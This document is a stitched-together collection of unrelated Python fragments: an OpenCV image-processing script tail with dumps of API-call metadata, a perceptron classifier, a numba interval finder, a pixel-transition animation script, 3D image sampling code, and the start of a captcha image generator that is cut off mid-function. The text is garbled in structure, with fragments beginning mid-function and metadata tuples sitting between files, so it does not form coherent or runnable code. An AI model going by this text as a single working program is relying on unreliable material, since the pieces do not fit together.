gamma = 0.4
LUT = np.empty((1, 256), np.uint8)
for i in range(256):
LUT[0, i] = np.clip((i / 255.0)**gamma * 255.0, 0, 255)
newimg2 = cv2.LUT(img, LUT)
cv2.imwrite("./part5/gamma_" + fn, newimg2)
def main():
# part 1
#reviseImage()
# part 2
#geoTransform()
# part 3
#addGaussianNoises()
# part 4
#removeGaussianNoises()
# part 5
luminanceAdjust()
if __name__ == "__main__":
main()
|
[
"cv2.equalizeHist",
"cv2.imwrite",
"numpy.empty",
"numpy.zeros",
"numpy.clip",
"cv2.fastNlMeansDenoising",
"cv2.imread",
"cv2.LUT",
"numpy.random.normal",
"cv2.normalize",
"os.listdir",
"cv2.resize"
] |
[((559, 580), 'os.listdir', 'os.listdir', (['"""./part1"""'], {}), "('./part1')\n", (569, 580), False, 'import os\n'), ((2020, 2041), 'os.listdir', 'os.listdir', (['"""./part3"""'], {}), "('./part3')\n", (2030, 2041), False, 'import os\n'), ((332, 368), 'cv2.imread', 'cv2.imread', (['fn', 'cv2.IMREAD_GRAYSCALE'], {}), '(fn, cv2.IMREAD_GRAYSCALE)\n', (342, 368), False, 'import cv2\n'), ((386, 413), 'cv2.resize', 'cv2.resize', (['img', '(640, 480)'], {}), '(img, (640, 480))\n', (396, 413), False, 'import cv2\n'), ((422, 472), 'cv2.imwrite', 'cv2.imwrite', (["('./part1/revised_' + filename)", 'newimg'], {}), "('./part1/revised_' + filename, newimg)\n", (433, 472), False, 'import cv2\n'), ((629, 667), 'cv2.imread', 'cv2.imread', (['path', 'cv2.IMREAD_UNCHANGED'], {}), '(path, cv2.IMREAD_UNCHANGED)\n', (639, 667), False, 'import cv2\n'), ((779, 839), 'cv2.resize', 'cv2.resize', (['img', '(1280, 960)'], {'interpolation': 'cv2.INTER_LINEAR'}), '(img, (1280, 960), interpolation=cv2.INTER_LINEAR)\n', (789, 839), False, 'import cv2\n'), ((857, 915), 'cv2.resize', 'cv2.resize', (['img', '(320, 240)'], {'interpolation': 'cv2.INTER_CUBIC'}), '(img, (320, 240), interpolation=cv2.INTER_CUBIC)\n', (867, 915), False, 'import cv2\n'), ((934, 993), 'cv2.resize', 'cv2.resize', (['img', '(1280, 720)'], {'interpolation': 'cv2.INTER_CUBIC'}), '(img, (1280, 720), interpolation=cv2.INTER_CUBIC)\n', (944, 993), False, 'import cv2\n'), ((1002, 1045), 'cv2.imwrite', 'cv2.imwrite', (["('./part2/double_' + fn)", 'double'], {}), "('./part2/double_' + fn, double)\n", (1013, 1045), False, 'import cv2\n'), ((1054, 1097), 'cv2.imwrite', 'cv2.imwrite', (["('./part2/shrink_' + fn)", 'shrink'], {}), "('./part2/shrink_' + fn, shrink)\n", (1065, 1097), False, 'import cv2\n'), ((1106, 1151), 'cv2.imwrite', 'cv2.imwrite', (["('./part2/stretch_' + fn)", 'stretch'], {}), "('./part2/stretch_' + fn, stretch)\n", (1117, 1151), False, 'import cv2\n'), ((2090, 2128), 'cv2.imread', 'cv2.imread', (['path', 'cv2.IMREAD_UNCHANGED'], {}), '(path, cv2.IMREAD_UNCHANGED)\n', (2100, 2128), False, 'import cv2\n'), ((2146, 2192), 'cv2.fastNlMeansDenoising', 'cv2.fastNlMeansDenoising', (['img', 'None', '(10)', '(7)', '(21)'], {}), '(img, None, 10, 7, 21)\n', (2170, 2192), False, 'import cv2\n'), ((2201, 2245), 'cv2.imwrite', 'cv2.imwrite', (["('./part4/denoise_' + fn)", 'newimg'], {}), "('./part4/denoise_' + fn, newimg)\n", (2212, 2245), False, 'import cv2\n'), ((2482, 2520), 'cv2.imread', 'cv2.imread', (['path', 'cv2.IMREAD_UNCHANGED'], {}), '(path, cv2.IMREAD_UNCHANGED)\n', (2492, 2520), False, 'import cv2\n'), ((2570, 2591), 'cv2.equalizeHist', 'cv2.equalizeHist', (['img'], {}), '(img)\n', (2586, 2591), False, 'import cv2\n'), ((2600, 2644), 'cv2.imwrite', 'cv2.imwrite', (["('./part5/equHist_' + fn)", 'newimg'], {}), "('./part5/equHist_' + fn, newimg)\n", (2611, 2644), False, 'import cv2\n'), ((2709, 2737), 'numpy.empty', 'np.empty', (['(1, 256)', 'np.uint8'], {}), '((1, 256), np.uint8)\n', (2717, 2737), True, 'import numpy as np\n'), ((2853, 2870), 'cv2.LUT', 'cv2.LUT', (['img', 'LUT'], {}), '(img, LUT)\n', (2860, 2870), False, 'import cv2\n'), ((2879, 2922), 'cv2.imwrite', 'cv2.imwrite', (["('./part5/gamma_' + fn)", 'newimg2'], {}), "('./part5/gamma_' + fn, newimg2)\n", (2890, 2922), False, 'import cv2\n'), ((1498, 1534), 'cv2.imread', 'cv2.imread', (['fn', 'cv2.IMREAD_UNCHANGED'], {}), '(fn, cv2.IMREAD_UNCHANGED)\n', (1508, 1534), False, 'import cv2\n'), ((1558, 1592), 'numpy.random.normal', 'np.random.normal', (['m', 's', '(480, 640)'], {}), '(m, s, (480, 640))\n', (1574, 1592), True, 'import numpy as np\n'), ((1619, 1650), 'numpy.zeros', 'np.zeros', (['img.shape', 'np.float32'], {}), '(img.shape, np.float32)\n', (1627, 1650), True, 'import numpy as np\n'), ((1704, 1778), 'cv2.normalize', 'cv2.normalize', (['noisy_image', 'noisy_image', '(0)', '(255)', 'cv2.NORM_MINMAX'], {'dtype': '(-1)'}), '(noisy_image, noisy_image, 0, 255, cv2.NORM_MINMAX, dtype=-1)\n', (1717, 1778), False, 'import cv2\n'), ((1863, 1925), 'cv2.imwrite', 'cv2.imwrite', (["('./part3/%d_%d_' % (m, v) + filename)", 'noisy_image'], {}), "('./part3/%d_%d_' % (m, v) + filename, noisy_image)\n", (1874, 1925), False, 'import cv2\n'), ((2791, 2836), 'numpy.clip', 'np.clip', (['((i / 255.0) ** gamma * 255.0)', '(0)', '(255)'], {}), '((i / 255.0) ** gamma * 255.0, 0, 255)\n', (2798, 2836), True, 'import numpy as np\n')]
|
'''
Author:
<NAME> <<EMAIL>>
<NAME> <<EMAIL>>
'''
import numpy as np
class Perceptron:
def __init__(self, datapoints, no_of_inputs, threshold=1000, learning_rate=0.0001, isPocket = False):
self.threshold = threshold
self.learning_rate = learning_rate
self.weights = np.random.normal(0, 0.1, no_of_inputs + 1)
self.datapoints = datapoints
self.isPocket = isPocket
def predict(self, inputs):
summation = np.dot(inputs, self.weights[1:]) + self.weights[0]
if summation > 0:
activation = 1
else:
activation = 0
return activation
def train(self):
training_inputs, labels = self.datapoints[:,:-2], self.datapoints[:,-2:-1]
misclassified = 1
iteration = 0
while misclassified != 0:
misclassified = 0
iteration += 1
for inputs, label in zip(training_inputs, labels):
prediction = self.predict(inputs)
error_rate = 1 if label == 1 else -1
if (label == 1 and prediction == 0) or (label == -1 and prediction == 1):
misclassified += 1
self.weights[1:] += self.learning_rate * error_rate * inputs
self.weights[0] += self.learning_rate * error_rate
if iteration % 50 == 0:
print("Iteration {}, misclassified points {}, Evaluation {}%".format(iteration, misclassified, self.evaluate()))
print("")
print("======== Result ========= ")
print("Iteration {}, misclassified points {}".format(iteration, misclassified))
print("Evaluation {}%".format(self.evaluate()))
def evaluate(self):
correct = 0
training_inputs, labels = self.datapoints[:,:-2], self.datapoints[:,-2:-1]
for inputs, label in zip(training_inputs, labels):
prediction = self.predict(inputs)
if (label == 1 and prediction == 1) or (label == -1 and prediction == 0):
correct += 1
_acc = correct / float(len(training_inputs)) * 100.0
return _acc
def printResult(self):
print("Weights After Final Iteration: ", np.round(self.weights.transpose(),3))
#print("Accuracy of Pocket: {}%", self.evaluate())
def getInputData(filename):
data = np.genfromtxt(filename, delimiter=',')
return data
if __name__ == '__main__':
data_points = np.array(getInputData('classification.txt'))
no_of_inputs = 3
pct = Perceptron(data_points, no_of_inputs)
pct.train()
pct.evaluate()
pct.printResult()
|
[
"numpy.dot",
"numpy.genfromtxt",
"numpy.random.normal"
] |
[((2356, 2394), 'numpy.genfromtxt', 'np.genfromtxt', (['filename'], {'delimiter': '""","""'}), "(filename, delimiter=',')\n", (2369, 2394), True, 'import numpy as np\n'), ((310, 352), 'numpy.random.normal', 'np.random.normal', (['(0)', '(0.1)', '(no_of_inputs + 1)'], {}), '(0, 0.1, no_of_inputs + 1)\n', (326, 352), True, 'import numpy as np\n'), ((475, 507), 'numpy.dot', 'np.dot', (['inputs', 'self.weights[1:]'], {}), '(inputs, self.weights[1:])\n', (481, 507), True, 'import numpy as np\n')]
|
import numba
import numpy as np
import pandas as pd
from scipy.interpolate import interp1d
import strax
export, __all__ = strax.exporter(export_self=True)
def init_spe_scaling_factor_distributions(file):
# Extract the spe pdf from a csv file into a pandas dataframe
spe_shapes = pd.read_csv(file)
# Create a converter array from uniform random numbers to SPE gains (one interpolator per channel)
# Scale the distributions so that they have an SPE mean of 1 and then calculate the cdf
uniform_to_pe_arr = []
for ch in spe_shapes.columns[1:]: # skip the first element which is the 'charge' header
if spe_shapes[ch].sum() > 0:
mean_spe = (spe_shapes['charge'] * spe_shapes[ch]).sum() / spe_shapes[ch].sum()
scaled_bins = spe_shapes['charge'] / mean_spe
cdf = np.cumsum(spe_shapes[ch]) / np.sum(spe_shapes[ch])
else:
# if sum is 0, just make some dummy axes to pass to interpolator
cdf = np.linspace(0, 1, 10)
scaled_bins = np.zeros_like(cdf)
uniform_to_pe_arr.append(interp1d(cdf, scaled_bins))
if uniform_to_pe_arr != []:
return uniform_to_pe_arr
@export
@numba.jit(numba.int32(numba.int64[:], numba.int64, numba.int64, numba.int64[:, :]),
nopython=True)
def find_intervals_below_threshold(w, threshold, holdoff, result_buffer):
"""Fills result_buffer with l, r bounds of intervals in w < threshold.
:param w: Waveform to do hitfinding in
:param threshold: Threshold for including an interval
:param result_buffer: numpy N*2 array of ints, will be filled by function.
if more than N intervals are found, none past the first N will be processed.
:returns : number of intervals processed
Boundary indices are inclusive, i.e. the right boundary is the last index which was < threshold
"""
result_buffer_size = len(result_buffer)
last_index_in_w = len(w) - 1
in_interval = False
current_interval = 0
current_interval_start = -1
current_interval_end = -1
for i, x in enumerate(w):
if x < threshold:
if not in_interval:
# Start of an interval
in_interval = True
current_interval_start = i
current_interval_end = i
if ((i == last_index_in_w and in_interval) or
(x >= threshold and i >= current_interval_end + holdoff and in_interval)):
# End of the current interval
in_interval = False
# Add bounds to result buffer
result_buffer[current_interval, 0] = current_interval_start
result_buffer[current_interval, 1] = current_interval_end
current_interval += 1
if current_interval == result_buffer_size:
result_buffer[current_interval, 1] = len(w) - 1
n_intervals = current_interval # No +1, as current_interval was incremented also when the last interval closed
return n_intervals
|
[
"numpy.zeros_like",
"numpy.sum",
"pandas.read_csv",
"numba.int32",
"numpy.cumsum",
"scipy.interpolate.interp1d",
"numpy.linspace",
"strax.exporter"
] |
[((123, 155), 'strax.exporter', 'strax.exporter', ([], {'export_self': '(True)'}), '(export_self=True)\n', (137, 155), False, 'import strax\n'), ((290, 307), 'pandas.read_csv', 'pd.read_csv', (['file'], {}), '(file)\n', (301, 307), True, 'import pandas as pd\n'), ((1205, 1277), 'numba.int32', 'numba.int32', (['numba.int64[:]', 'numba.int64', 'numba.int64', 'numba.int64[:, :]'], {}), '(numba.int64[:], numba.int64, numba.int64, numba.int64[:, :])\n', (1216, 1277), False, 'import numba\n'), ((989, 1010), 'numpy.linspace', 'np.linspace', (['(0)', '(1)', '(10)'], {}), '(0, 1, 10)\n', (1000, 1010), True, 'import numpy as np\n'), ((1037, 1055), 'numpy.zeros_like', 'np.zeros_like', (['cdf'], {}), '(cdf)\n', (1050, 1055), True, 'import numpy as np\n'), ((1090, 1116), 'scipy.interpolate.interp1d', 'interp1d', (['cdf', 'scaled_bins'], {}), '(cdf, scaled_bins)\n', (1098, 1116), False, 'from scipy.interpolate import interp1d\n'), ((829, 854), 'numpy.cumsum', 'np.cumsum', (['spe_shapes[ch]'], {}), '(spe_shapes[ch])\n', (838, 854), True, 'import numpy as np\n'), ((857, 879), 'numpy.sum', 'np.sum', (['spe_shapes[ch]'], {}), '(spe_shapes[ch])\n', (863, 879), True, 'import numpy as np\n')]
|
import numpy as np
import scipy.linalg as la
import matplotlib.pyplot as plt
import matplotlib.animation as animation
from matplotlib.colors import rgb_to_hsv
from imageio import imread
from progress.bar import IncrementalBar
def grayscale_to_coords(image):
"""Sorts a grayscale image's pixels by saturation, and returns arrays
containing the row and column positions corresponding to sorted order,
as well as the sorted intensities as a flattened array."""
rot_image = np.rot90(image,k=-1)
rows,cols = np.unravel_index(np.argsort(rot_image,axis=None),shape=rot_image.shape)
colors = np.sort(rot_image.flatten())
return rows,cols,colors
def color_to_coords(image):
"""Sorts a color image's pixels by hue, and returns arrays containing the
row and column positions corresponding to sorted order, as well as the
sorted rgb values as a Nx3 array."""
rot_image = np.rot90(image,k=-1)
hue = rgb_to_hsv(rot_image)[:,:,0]
mask = np.argsort(hue,axis=None)
rows,cols = np.unravel_index(mask,shape=rot_image.shape[:2])
colors = rot_image.reshape((rot_image.shape[0]*rot_image.shape[1],3))[mask]
return rows,cols,colors
def animate_pixels(imfile1,imfile2,outfile,color=False,verbose=False):
"""Animates a pixel-motion transition between two images. Images must have
the exact same number of pixels. Animation is saved as "outfile".
Parameters
----------
imfile1 : str or file object
The file name or file object for the first image
imfile2 : str or file object
The file name or file object for the second image
outfile : str
The output file name
color : bool, optional
If True, runs in color mode
verbose : bool, optional
If True, displays a progress bar in the console
"""
# Read in images
if color:
img1 = np.array(imread(imfile1))/255
img2 = np.array(imread(imfile2))/255
else:
img1 = np.array(imread(imfile1,as_gray=True))/255
img2 = np.array(imread(imfile2,as_gray=True))/255
# Check number of pixels
if img1.shape[0]*img1.shape[1] != img2.shape[0]*img2.shape[1]:
raise ValueError("Images must have the name number of pixels")
# Sort pixels by saturation (if grayscale) or hue (if color)
if verbose: bar1 = IncrementalBar("Sorting\t\t", max=2,suffix='%(percent)d%%')
if color: rows1,cols1,colors1 = color_to_coords(img1)
else: rows1,cols1,colors1 = grayscale_to_coords(img1)
if verbose: bar1.next()
if color: rows2,cols2,colors2 = color_to_coords(img2)
else: rows2,cols2,colors2 = grayscale_to_coords(img2)
if verbose: bar1.next(); bar1.finish()
# n is number of frames of one-directional transition
# buffer is number of stationary frames before and after the transitions
# total is number of frames for two transitions with 2 buffer periods each
n=100
buffer = 10
total = 2*n+4*buffer
# np.linspace creates evenly spaced position and color arrays for transition
if verbose: bar2 = IncrementalBar("Interpolating\t",max=4,suffix='%(percent)d%%')
colors = np.linspace(colors1,colors2,n)
if verbose: bar2.next()
rows = np.linspace(rows1+.5,rows2+.5,n)
if verbose: bar2.next()
cols = np.linspace(cols1+.5,cols2+.5,n)
if verbose: bar2.next()
pos = np.dstack((rows,cols))
if verbose: bar2.next(); bar2.finish()
# Calculate the aspect ratio of the two images
aspect_ratio1 = img1.shape[0]/img1.shape[1]
aspect_ratio2 = img2.shape[0]/img2.shape[1]
plt.ioff()
# Figure will always have default matplotlib 6.4 inch width
fig = plt.figure(figsize=(6.4,max(aspect_ratio1,aspect_ratio2)*6.4))
ax = fig.add_subplot(111)
ax.set_aspect("equal")
plt.axis("off")
plt.xlim((0,max(img1.shape[1],img2.shape[1])))
plt.ylim((0,max(img1.shape[0],img2.shape[0])))
# Markers are measured in points, which are 1/72nd of an inch. Calculates
# pixel size in points
pixels = max(img1.shape[1],img2.shape[1])
pixels_per_inch = pixels/6.4
size = 72/pixels_per_inch
# core object is a scatter plot with square markers set to pixel size
if color:
points = ax.scatter(rows[0],cols[0],c=colors1,marker='s',s=size**2)
else:
points = ax.scatter(rows[0],cols[0],c=colors1,cmap="gray",marker='s',s=size**2,vmin=0,vmax=1)
# update function changes the scatter plot at each frame
# set_color works for rgb, set_array works for grayscale
def update(j):
if j >= buffer and j < buffer+n:
i = j-buffer
points.set_offsets(pos[i])
if color: points.set_color(colors[i])
else: points.set_array(colors[i])
elif j >= 3*buffer+n and j < 3*buffer+2*n:
i = n-(j-(3*buffer+n))-1
points.set_offsets(pos[i])
if color: points.set_color(colors[i])
else: points.set_array(colors[i])
if verbose: bar3.next()
if verbose: bar3 = IncrementalBar("Rendering\t",max=total,suffix='%(percent)d%%')
# Create FuncAnimation with 60-millisecond inteval between frames
ani = animation.FuncAnimation(fig,update,frames=total,interval=60)
# Save animation and close the figure
ani.save(outfile)
if verbose: bar3.next(); bar3.finish()
plt.close(fig)
plt.ion()
|
[
"numpy.dstack",
"matplotlib.pyplot.ioff",
"matplotlib.pyplot.close",
"progress.bar.IncrementalBar",
"imageio.imread",
"numpy.unravel_index",
"matplotlib.pyplot.axis",
"matplotlib.animation.FuncAnimation",
"numpy.argsort",
"matplotlib.pyplot.ion",
"numpy.rot90",
"numpy.linspace",
"matplotlib.colors.rgb_to_hsv"
] |
[((488, 509), 'numpy.rot90', 'np.rot90', (['image'], {'k': '(-1)'}), '(image, k=-1)\n', (496, 509), True, 'import numpy as np\n'), ((907, 928), 'numpy.rot90', 'np.rot90', (['image'], {'k': '(-1)'}), '(image, k=-1)\n', (915, 928), True, 'import numpy as np\n'), ((978, 1004), 'numpy.argsort', 'np.argsort', (['hue'], {'axis': 'None'}), '(hue, axis=None)\n', (988, 1004), True, 'import numpy as np\n'), ((1020, 1069), 'numpy.unravel_index', 'np.unravel_index', (['mask'], {'shape': 'rot_image.shape[:2]'}), '(mask, shape=rot_image.shape[:2])\n', (1036, 1069), True, 'import numpy as np\n'), ((3132, 3164), 'numpy.linspace', 'np.linspace', (['colors1', 'colors2', 'n'], {}), '(colors1, colors2, n)\n', (3143, 3164), True, 'import numpy as np\n'), ((3202, 3242), 'numpy.linspace', 'np.linspace', (['(rows1 + 0.5)', '(rows2 + 0.5)', 'n'], {}), '(rows1 + 0.5, rows2 + 0.5, n)\n', (3213, 3242), True, 'import numpy as np\n'), ((3274, 3314), 'numpy.linspace', 'np.linspace', (['(cols1 + 0.5)', '(cols2 + 0.5)', 'n'], {}), '(cols1 + 0.5, cols2 + 0.5, n)\n', (3285, 3314), True, 'import numpy as np\n'), ((3345, 3368), 'numpy.dstack', 'np.dstack', (['(rows, cols)'], {}), '((rows, cols))\n', (3354, 3368), True, 'import numpy as np\n'), ((3564, 3574), 'matplotlib.pyplot.ioff', 'plt.ioff', ([], {}), '()\n', (3572, 3574), True, 'import matplotlib.pyplot as plt\n'), ((3773, 3788), 'matplotlib.pyplot.axis', 'plt.axis', (['"""off"""'], {}), "('off')\n", (3781, 3788), True, 'import matplotlib.pyplot as plt\n'), ((5149, 5212), 'matplotlib.animation.FuncAnimation', 'animation.FuncAnimation', (['fig', 'update'], {'frames': 'total', 'interval': '(60)'}), '(fig, update, frames=total, interval=60)\n', (5172, 5212), True, 'import matplotlib.animation as animation\n'), ((5322, 5336), 'matplotlib.pyplot.close', 'plt.close', (['fig'], {}), '(fig)\n', (5331, 5336), True, 'import matplotlib.pyplot as plt\n'), ((5341, 5350), 'matplotlib.pyplot.ion', 'plt.ion', ([], {}), '()\n', (5348, 5350), True, 'import matplotlib.pyplot as plt\n'), ((542, 574), 'numpy.argsort', 'np.argsort', (['rot_image'], {'axis': 'None'}), '(rot_image, axis=None)\n', (552, 574), True, 'import numpy as np\n'), ((938, 959), 'matplotlib.colors.rgb_to_hsv', 'rgb_to_hsv', (['rot_image'], {}), '(rot_image)\n', (948, 959), False, 'from matplotlib.colors import rgb_to_hsv\n'), ((2322, 2382), 'progress.bar.IncrementalBar', 'IncrementalBar', (['"""Sorting\t\t"""'], {'max': '(2)', 'suffix': '"""%(percent)d%%"""'}), "('Sorting\\t\\t', max=2, suffix='%(percent)d%%')\n", (2336, 2382), False, 'from progress.bar import IncrementalBar\n'), ((3056, 3120), 'progress.bar.IncrementalBar', 'IncrementalBar', (['"""Interpolating\t"""'], {'max': '(4)', 'suffix': '"""%(percent)d%%"""'}), "('Interpolating\\t', max=4, suffix='%(percent)d%%')\n", (3070, 3120), False, 'from progress.bar import IncrementalBar\n'), ((5005, 5069), 'progress.bar.IncrementalBar', 'IncrementalBar', (['"""Rendering\t"""'], {'max': 'total', 'suffix': '"""%(percent)d%%"""'}), "('Rendering\\t', max=total, suffix='%(percent)d%%')\n", (5019, 5069), False, 'from progress.bar import IncrementalBar\n'), ((1873, 1888), 'imageio.imread', 'imread', (['imfile1'], {}), '(imfile1)\n', (1879, 1888), False, 'from imageio import imread\n'), ((1918, 1933), 'imageio.imread', 'imread', (['imfile2'], {}), '(imfile2)\n', (1924, 1933), False, 'from imageio import imread\n'), ((1973, 2002), 'imageio.imread', 'imread', (['imfile1'], {'as_gray': '(True)'}), '(imfile1, as_gray=True)\n', (1979, 2002), False, 'from imageio import imread\n'), ((2031, 2060), 'imageio.imread', 'imread', (['imfile2'], {'as_gray': '(True)'}), '(imfile2, as_gray=True)\n', (2037, 2060), False, 'from imageio import imread\n')]
|
import numpy as np
from joblib import Parallel, delayed
from .affine import *
from .deformation import *
def select_image_samples(image, shape=(64,64,64), n=10, seed=None, with_augmentation=False):
"""
Select n samples from an image (z,x,y) with the given shape. Returns the sampled positions as (x,y,z) coordinates in image space.
Args:
image (numpy.array): an 3D image or array of images
shape (tuple): the sample shape
n (int): the number of samples to be sampled
seed (int): a random seed for reproducability of the sampling
Returns:
(np.array) returns an array of sampled positions
"""
positions=[]
if seed!=None:
np.random.seed(seed)
if with_augmentation:
sp=np.power(shape,2)
diagonal=np.ceil(np.sqrt(np.max([sp[0]+sp[1],sp[1]+sp[2],sp[2]+sp[0]]))).astype("uint32")
padding=np.ceil(np.max(np.array(diagonal-shape))).astype("uint32")
else:
padding=0
new_shape=np.array(shape)+2*padding
while len(positions) < n:
z = np.random.randint(padding,image.shape[0]-new_shape[0]-1)
x = np.random.randint(padding,image.shape[1]-new_shape[1]-1)
y = np.random.randint(padding,image.shape[2]-new_shape[2]-1)
positions.append([z,x,y])
return positions
def get_image_samples(image, positions, shape=(64,64,64), with_rotation=False, max_rotations=(90,90,90), order=3, with_deformation=False, max_displacement=20, sigma=3, seed=None, cores=1):
"""
Extract samples of the given shape from an image (z,x,y) at the given positions.
Args:
image (numpy.array): an 3D image or array of images
shape (tuple): the sample shape
positions (np.array): the sample positions
Returns:
(np.array) returns an array of sampled sub-images
"""
if order>0:
method="linear"
else:
method="nearest"
if seed != None:
np.random.seed(seed)
if with_rotation or with_deformation:
sp=np.power(shape,2)
diagonal=np.ceil(np.sqrt(np.max([sp[0]+sp[1],sp[1]+sp[2],sp[2]+sp[0]]))).astype("uint32")
padding=np.ceil(np.max(np.array(diagonal-shape))).astype("uint32")
else:
padding=0
if with_deformation:
sample_shape=_crop_sample(image, positions[0], padding, shape).shape
deformations=np.array([random_deformation_field(sample_shape, max_displacement, sigma) for i in range(len(positions))])
else:
deformations=np.repeat(None,len(positions))
if with_rotation:
rotations=np.array([sample_rotation(max_rotations) for i in range(len(positions))])
else:
rotations=np.repeat(None,len(positions))
samples=np.array(Parallel(cores)(delayed(_crop_sample)(image,pos,padding,shape) for pos in positions))
samples=np.array(Parallel(cores)(delayed(_create_sample)(sample, shape, padding, rot, deform, order) for sample,rot,deform in zip(samples,rotations,deformations)))
if image.shape[-1] == 1:
return np.expand_dims(samples, axis=-1)
else:
return samples
def _create_sample(sample, shape, padding=0, rotations=None, deformation=None, order=3):
if type(rotations) != type(None):
sample=apply_rotation(sample, rotations, order)
if type(deformation) != type(None):
method = "linear" if order>0 else "nearest"
sample=apply_deformation_field(sample, deformation, method)
return np.squeeze(sample[padding:padding+shape[0],padding:padding+shape[1],padding:padding+shape[2]])
def _crop_sample(image, position, padding, shape):
z,x,y=position
return image[(z-padding):z+shape[0]+padding,(x-padding):x+shape[1]+padding,(y-padding):y+shape[2]+padding]
|
[
"numpy.random.seed",
"numpy.power",
"numpy.expand_dims",
"numpy.max",
"numpy.random.randint",
"numpy.array",
"joblib.Parallel",
"numpy.squeeze",
"joblib.delayed"
] |
[((3458, 3564), 'numpy.squeeze', 'np.squeeze', (['sample[padding:padding + shape[0], padding:padding + shape[1], padding:\n padding + shape[2]]'], {}), '(sample[padding:padding + shape[0], padding:padding + shape[1],\n padding:padding + shape[2]])\n', (3468, 3564), True, 'import numpy as np\n'), ((699, 719), 'numpy.random.seed', 'np.random.seed', (['seed'], {}), '(seed)\n', (713, 719), True, 'import numpy as np\n'), ((757, 775), 'numpy.power', 'np.power', (['shape', '(2)'], {}), '(shape, 2)\n', (765, 775), True, 'import numpy as np\n'), ((990, 1005), 'numpy.array', 'np.array', (['shape'], {}), '(shape)\n', (998, 1005), True, 'import numpy as np\n'), ((1058, 1119), 'numpy.random.randint', 'np.random.randint', (['padding', '(image.shape[0] - new_shape[0] - 1)'], {}), '(padding, image.shape[0] - new_shape[0] - 1)\n', (1075, 1119), True, 'import numpy as np\n'), ((1127, 1188), 'numpy.random.randint', 'np.random.randint', (['padding', '(image.shape[1] - new_shape[1] - 1)'], {}), '(padding, image.shape[1] - new_shape[1] - 1)\n', (1144, 1188), True, 'import numpy as np\n'), ((1196, 1257), 'numpy.random.randint', 'np.random.randint', (['padding', '(image.shape[2] - new_shape[2] - 1)'], {}), '(padding, image.shape[2] - new_shape[2] - 1)\n', (1213, 1257), True, 'import numpy as np\n'), ((1938, 1958), 'numpy.random.seed', 'np.random.seed', (['seed'], {}), '(seed)\n', (1952, 1958), True, 'import numpy as np\n'), ((2021, 2039), 'numpy.power', 'np.power', (['shape', '(2)'], {}), '(shape, 2)\n', (2029, 2039), True, 'import numpy as np\n'), ((3033, 3065), 'numpy.expand_dims', 'np.expand_dims', (['samples'], {'axis': '(-1)'}), '(samples, axis=-1)\n', (3047, 3065), True, 'import numpy as np\n'), ((2735, 2750), 'joblib.Parallel', 'Parallel', (['cores'], {}), '(cores)\n', (2743, 2750), False, 'from joblib import Parallel, delayed\n'), ((2842, 2857), 'joblib.Parallel', 'Parallel', (['cores'], {}), '(cores)\n', (2850, 2857), False, 'from joblib import Parallel, delayed\n'), ((2751, 2772), 'joblib.delayed', 'delayed', (['_crop_sample'], {}), '(_crop_sample)\n', (2758, 2772), False, 'from joblib import Parallel, delayed\n'), ((2858, 2881), 'joblib.delayed', 'delayed', (['_create_sample'], {}), '(_create_sample)\n', (2865, 2881), False, 'from joblib import Parallel, delayed\n'), ((808, 861), 'numpy.max', 'np.max', (['[sp[0] + sp[1], sp[1] + sp[2], sp[2] + sp[0]]'], {}), '([sp[0] + sp[1], sp[1] + sp[2], sp[2] + sp[0]])\n', (814, 861), True, 'import numpy as np\n'), ((904, 930), 'numpy.array', 'np.array', (['(diagonal - shape)'], {}), '(diagonal - shape)\n', (912, 930), True, 'import numpy as np\n'), ((2072, 2125), 'numpy.max', 'np.max', (['[sp[0] + sp[1], sp[1] + sp[2], sp[2] + sp[0]]'], {}), '([sp[0] + sp[1], sp[1] + sp[2], sp[2] + sp[0]])\n', (2078, 2125), True, 'import numpy as np\n'), ((2168, 2194), 'numpy.array', 'np.array', (['(diagonal - shape)'], {}), '(diagonal - shape)\n', (2176, 2194), True, 'import numpy as np\n')]
|
#!/usr/bin/python
# -*- coding: UTF-8 -*-
import os
import time
import json
import random
import numpy as np
from jinja2 import Template
from PIL import Image, ImageDraw, ImageFont
class ConfigError(Exception):
pass
class ClickCaptcha(object):
def __init__(self):
# 根目录
self.basedir = os.getcwd()
# if not os.path.exists(self.basedir):
# os.mkdir(self.basedir)
# 图片设置
# self.no_steps = self.height # 渐变迭代次数
self.width = 320 # 宽度
self.height = 160 # 高度
self.mode = "RGB" # 图片生成模式
# 文字设置
self.enable_add_text = True
# 目标数量
self.word_count_min = 3
self.word_count_max = 20
self.word_offset = 5 # 字符之间的最小距离
self.width_left_offset = 10 # 字符距离边界的距离
self.width_right_offset = 40
self.height_top_offset = 10
self.height_bottom_offset = 40
# 字体预留
self.word_size = 30 # 字体大小
self.font_path = None
self.set_font = None
self.word_list_file_path = None
self.word_list = None
self.location_offset = 0
# 干扰线
self.enable_interference_line = False
self.inter_line_min = 10
self.inter_line_max = 16
self.interference_line_width = 3
self.interference_line_radius = (-40, 40)
# 虚构文字
self.enable_dummy_word = False
self.dummy_word_width = 2 # 虚构文字的线宽度
self.dummy_word_count_min = 3
self.dummy_word_count_max = 5
self.dummy_word_strokes_min = 6
self.dummy_word_strokes_max = 15
self.dummy_word_color = (0, 0, 0)
# 图片保存路径
self.enable_save_status = True
self.image_postfix = "jpg"
self.save_img_dir = os.path.join(self.basedir, "JPEGImages")
self.save_label_dir = os.path.join(self.basedir, "Annotations")
# 文件配置
self.label_type = "xml"
if self.label_type == "json":
self.json_pretty = True
if self.json_pretty:
self.indent = 4
else:
self.indent = None
elif self.label_type == "xml":
self.template_path = "exp.xml"
# 内部参数
self.word_point_list = None
self.img = None
self.draw = None
self.word_count = None
self.gradient = None
self.label_string = None
def font_settings(self, word_size=32, font_path=None, word_list_file_path=None):
self.word_size = word_size # 字体大小
self.font_path = font_path # 字体路径
self.word_list_file_path = word_list_file_path # 汉字映射
self.location_offset = int(self.word_size // 6)
# 字体和字符集
if self.font_path:
self.set_font = ImageFont.truetype(self.font_path, self.word_size) # 设置字体
else:
raise ConfigError("请指定字体文件的绝对路径或者相对路径,例如:C:/windows/fonts/simkai.ttf")
# 字符集路径
if self.word_list_file_path:
self.word_list = list() # 字符集:字符集从文件中读取的时候必须是数组形式
with open(self.word_list_file_path, "r", encoding="utf-8") as f:
self.word_list = json.load(f)
else:
raise ConfigError("请指定文字字典文件的绝对路径或者相对路径,例如:data/chinese_word.json")
def get_random_word(self):
return random.choice(self.word_list)
@staticmethod
def gen_random_color():
"""
获取随机的一种背景色(去掉了偏黑系颜色)
:return:
"""
a = random.randint(0, 255)
b = random.randint(50, 255)
c = random.randint(50, 255)
return a, b, c
@staticmethod
def gen_random_line_color():
"""
获取随机的线条颜色
:return:
"""
a = random.randint(0, 255)
b = random.randint(0, 255)
